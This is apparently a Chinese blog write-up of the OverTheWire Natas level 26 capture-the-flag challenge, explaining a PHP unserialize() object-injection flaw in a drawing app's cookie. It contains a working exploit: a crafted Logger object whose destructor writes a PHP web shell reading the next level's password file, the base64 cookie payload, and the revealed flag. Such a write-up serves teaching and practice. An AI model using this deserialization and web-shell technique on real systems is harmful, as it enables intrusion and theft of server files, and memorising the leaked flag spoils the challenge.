Natas26:

打开页面是一个输入坐标点进行绘图的页面。

<html>

<head>

<!-- This stuff in the header has nothing to do with the level -->

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">

<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />

<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />

<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>

<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>

<script src="http://natas.labs.overthewire.org/js/wechall-data.js"></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>

<script>var wechallinfo = { "level": "natas26", "pass": "<censored>" };</script></head>

<body>

<?php

    class Logger{

        private $logFile;                        //三个私有参数

        private $initMsg;

        private $exitMsg;

        function __construct($file){            //类创建时调用

            // initialise variables                //初始化变量

            $this->initMsg="#--session started--#\n";

            $this->exitMsg="#--session end--#\n";

            $this->logFile = "/tmp/natas26_" . $file . ".log";

            // write initial message            //写入初始信息

            $fd=fopen($this->logFile,"a+");

            fwrite($fd,$initMsg);

            fclose($fd);

        }                       

        function log($msg){                        //写入信息

            $fd=fopen($this->logFile,"a+");

            fwrite($fd,$msg."\n");

            fclose($fd);

        }                       

        function __destruct(){                    //类销毁时调用

            // write exit message                //写入退出信息

            $fd=fopen($this->logFile,"a+");

            fwrite($fd,$this->exitMsg);

            fclose($fd);

        }

    }

    function showImage($filename){                //显示图片

        if(file_exists($filename))

            echo "<img src=\"$filename\">";

    }

    function drawImage($filename){                //画图

        $img=imagecreatetruecolor(400,300);

        drawFromUserdata($img);

        imagepng($img,$filename);

        imagedestroy($img);

    }

    function drawFromUserdata($img){

        if( array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&

            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){

            $color=imagecolorallocate($img,0xff,0x12,0x1c);

            imageline($img,$_GET["x1"], $_GET["y1"],

                            $_GET["x2"], $_GET["y2"], $color);

        }

        if (array_key_exists("drawing", $_COOKIE)){

            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));

            if($drawing)

                foreach($drawing as $object)

                    if( array_key_exists("x1", $object) &&

                        array_key_exists("y1", $object) &&

                        array_key_exists("x2", $object) &&

                        array_key_exists("y2", $object)){

                        $color=imagecolorallocate($img,0xff,0x12,0x1c);

                        imageline($img,$object["x1"],$object["y1"],

                                $object["x2"] ,$object["y2"] ,$color);

                    }

        }

    }

    function storeData(){

        $new_object=array();

        if(array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&

            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){

            $new_object["x1"]=$_GET["x1"];

            $new_object["y1"]=$_GET["y1"];

            $new_object["x2"]=$_GET["x2"];

            $new_object["y2"]=$_GET["y2"];

        }

        if (array_key_exists("drawing", $_COOKIE)){

            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));    //反序列化

        }

        else{

            // create new array

            $drawing=array();

        }

        $drawing[]=$new_object;

        setcookie("drawing",base64_encode(serialize($drawing)));        //序列化

    }

?>

<h1>natas26</h1>

<div id="content">

Draw a line:<br>

<form name="input" method="get">

X1<input type="text" name="x1" size=2>

Y1<input type="text" name="y1" size=2>

X2<input type="text" name="x2" size=2>

Y2<input type="text" name="y2" size=2>

<input type="submit" value="DRAW!">

</form> 

<?php

    session_start();

    if (array_key_exists("drawing", $_COOKIE) ||

        (   array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&

            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET))){

        $imgfile="img/natas26_" . session_id() .".png";

        drawImage($imgfile);

        showImage($imgfile);

        storeData();

    }

?>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

</div>

</body>

</html>

natas26-sourcecode.html

查看源码,发现了php反序列化函数unserialize(),且可以通过cookie来控制unserialize()的变量,猜测存在php反序列化漏洞。

Php序列化:php为了方便进行数据的传输,允许把复杂的数据结构,压缩到一个字符串中。使用serialize()函数。

Php反序列化:将被压缩为字符串的复杂数据结构,重新恢复。使用unserialize() 函数。

php反序列化漏洞:php有许多魔术方法,如果代码中使用了反序列化 unserialize()函数,并且参数可控制,那么可以通过设定注入参数来完成想要实现的目的。

关键代码:

class Logger{

	private $logFile;						//三个私有参数

	private $initMsg;

	private $exitMsg;

	function __construct($file){			//类创建时调用

		// initialise variables				//初始化变量

		$this->initMsg="#--session started--#\n";

		$this->exitMsg="#--session end--#\n";

		$this->logFile = "/tmp/natas26_" . $file . ".log";

		// write initial message			//写入初始信息

		$fd=fopen($this->logFile,"a+");

		fwrite($fd,$initMsg);

		fclose($fd);

	}                       

	function log($msg){						//写入信息

		$fd=fopen($this->logFile,"a+");

		fwrite($fd,$msg."\n");

		fclose($fd);

	}                       

	function __destruct(){					//类销毁时调用

		// write exit message				//写入退出信息

		$fd=fopen($this->logFile,"a+");

		fwrite($fd,$this->exitMsg);

		fclose($fd);

	}

}

观察代码可以发现,在类销毁时调用的__destruct()魔术方法,可以向任意文件写入信息。

if (array_key_exists("drawing", $_COOKIE)){

	$drawing=unserialize(base64_decode($_COOKIE["drawing"]));

}

而且,可以通过cookie来写入序列化注入信息。

总结思路,通过cookie来注入信息,利用反序列化漏洞在能够访问的文件夹(img)下建立一个shell(aaa.php),写入php语句,然后访问该脚本,就能够进行任意语句执行/回显!

Payload:

<?php

class Logger{

        private $logFile;

        private $initMsg;

        private $exitMsg;

        function __construct(){   #注入信息

            $this->initMsg="";

            $this->exitMsg="<php include '/etc/natas_webpass/natas27';?>";

            $this->logFile="img/aaa.php";

        }

}

$test = new Logger();

echo serialize($test);

echo "\n";

echo base64_encode(serialize($test));    #显示base64编码后的序列化字符串

?>
本地执行,得到base64编码后的序列化字符串:
Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxMToiaW1nL2FhYS5waHAiO3M6MTU6IgBMb2dnZXIAaW5pdE1zZyI7czowOiIiO3M6MTU6IgBMb2dnZXIAZXhpdE1zZyI7czo0NjoiPD9waHAgaW5jbHVkZSgnL2V0Yy9uYXRhc193ZWJwYXNzL25hdGFzMjcnKTs/PiI7fQ==
 

burp抓包,把字符串覆盖到cookie[drawing]中,重新发送请求。

访问../img/aaa.php即可得到flag。

flag:55TBjpPZUUJgVP5b3BnbG6ON9uDPVzCJ

参考:

https://www.cnblogs.com/ichunqiu/p/9554885.html
https://www.cnblogs.com/liqiuhao/p/6901620.html
https://blog.csdn.net/baidu_35297930/article/details/99732206?utm_source=distribute.pc_relevant.none-task

Natas26 Writeup(PHP反序列化漏洞)的更多相关文章

  1. Natas33 Writeup(Phar反序列化漏洞)

    Natas33: 又是一个上传文件的页面,源码如下: // graz XeR, the first to solve it! thanks for the feedback! // ~morla cl ...

  2. 反序列化漏洞问题研究之php篇

    php的反序列化反序列化漏洞又称php对象注入(php Object Injection)产生的问题主要分以下两类: 将传来的序列化数据直接unserilize,造成魔幻函数的执行.这种情况在一般的应 ...

  3. Weblogic反序列化漏洞补丁更新解决方案

    Weblogic反序列化漏洞的解决方案基于网上给的方案有两种: 第一种方案如下 使用SerialKiller替换进行序列化操作的ObjectInputStream类; 在不影响业务的情况下,临时删除掉 ...

  4. Java反序列化漏洞执行命令回显实现及Exploit下载

    原文地址:http://www.freebuf.com/tools/88908.html 本文原创作者:rebeyond 文中提及的部分技术.工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使 ...

  5. Java反序列化漏洞通用利用分析

    原文:http://blog.chaitin.com/2015-11-11_java_unserialize_rce/ 博主也是JAVA的,也研究安全,所以认为这个漏洞非常严重.长亭科技分析的非常细致 ...

  6. Java反序列化漏洞分析

    相关学习资料 http://www.freebuf.com/vuls/90840.html https://security.tencent.com/index.php/blog/msg/97 htt ...

  7. 小白审计JACKSON反序列化漏洞

    1. JACKSON漏洞解析 poc代码:main.java import com.fasterxml.jackson.databind.ObjectMapper; import com.sun.or ...

  8. WEBLOGIC 11G (10.3.6) windows PSU 升级10.3.6.0.171017(Java 反序列化漏洞升级)

    10.3.6版本的weblogic需要补丁到10.3.6.0.171017(2017年10月份的补丁,Java 反序列化漏洞升级),oracle官方建议至少打上2017年10月份补丁. 一.查看版本 ...

  9. weblogic AND jboss 反序列化漏洞

    C:\Program Files\Java\jboss-4.2.3.GA\server\default\deploy\http-invoker.sar\invoker.war\WEB-INF serv ...

随机推荐

  1. JMeter之BeanShell断言---equals使用

    判断变量是否为root if(!"${User}".equals("root")){ Failure=true; FailureMessage="ER ...

  2. MongoDB启动.mongorc.js报错解决方法

    在bin目录下输入./mongo --norc 不去加载.mongorc.js

  3. USB小白学习之路(11) Cy7c68013A驱动电路设计注意事项(转)

    Cy7c68013A驱动电路设计注意事项 转自:http://group.chinaaet.com/116/79029#0-tsina-1-71467-397232819ff9a47a7b7e80a4 ...

  4. web系统是否要前后端分离?

    开发一个web管理系统,是否要采用如今流行的前后端分离模式? 首先要从为什么会出现前后端分离说起,前后端分离的目的. 1.让前端工程师(前端)和后端工程师(后端)们能够更加专注于自己的领域 传统的开发 ...

  5. 达拉草201771010105《面向对象程序设计(java)》第一周学习总结

    达拉草201771010105<面向对象程序设计(java)>第一周学习总结 第一部分:课程准备部分 填写课程学习 平台注册账号, 平台名称 注册账号 博客园:www.cnblogs.co ...

  6. ADO.NET中DataTable类的使用

    DataTable类将关系数据表示为表格形式.在创建DataTable之前,必须包含System.Data名称空间.ADO.NET提供了一个DataTable类来独立创建和使用数据表.它也可以和Dat ...

  7. Redis简单的数据操作(增删改查)

    #Redis简单的数据操作(增删改查): 字符串类型 string 1. 存储: set key value 127.0.0.1:6379> set username zhangsan OK 2 ...

  8. 沙雕与大婶 | Mock调你的外部依赖吧

    故事背景: 沙雕在公司负责API项目的开发,很认真负责,经常加班加点赶进度,却常常被老板吐槽说他开发效率太低,他自己也很委屈,因为他所负责的项目常常依赖大量外部系统,他只好等对方开发完才一个个对接,开 ...

  9. 从HTML标签开始

    开始这一切吧! 没错,你没看错,我将从HTML标签开始我的整个系列文章.很基础吧?但是每个前端人都是从最简单的HTML标签开始的,都是从一个<html></html>开始整个前 ...

  10. startUML5.0中的tools下怎么没有java、c等选项

    这也是帮一个直系学妹弄得,哈哈~~~ 具体做法如下: 进入到StartUML\modules目录下,里面有很多文件夹,比如startuml-cpp.startuml-csharp等等, 进入到每个文件 ...